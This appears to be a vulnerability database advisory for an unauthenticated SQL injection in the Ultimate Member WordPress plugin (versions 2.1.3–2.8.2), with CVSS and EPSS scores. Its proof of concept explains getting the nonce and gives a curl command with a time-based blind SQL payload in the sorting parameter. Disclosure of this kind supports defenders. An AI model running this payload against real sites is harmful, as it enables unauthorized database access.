WpvulndbWPEX-ID:DCCA7ED0-B088-4B7D-9E22-07B858367975Ultimate Member 2.1.3 - 2.8.2 - Unauthenticated SQL Injection
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
27.0%
Description The plugin does not sanitize and escape the sorting parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks when the “Enable custom table for usermeta” option is enabled.
Requirement: "Enable custom table for usermeta" option to be enabled (Ultimate Member > Settings > Misc)
As unauthenticated, retrieve the nonce from the source of the homepage by searching for var um_scripts. Then run the below cURL command and note the 5s delay from the response:
curl -X POST --data 'action=um_get_members&nonce=<NONCE>&directory_id=b9238&sorting=ID%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)' https://example.com/wp-admin/admin-ajax.php
PS: The directory_id calculated via "SUBSTRING( MD5( POST_ID ), 11, 5)" and in the example above, this is for POST_ID=1Related
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
27.0%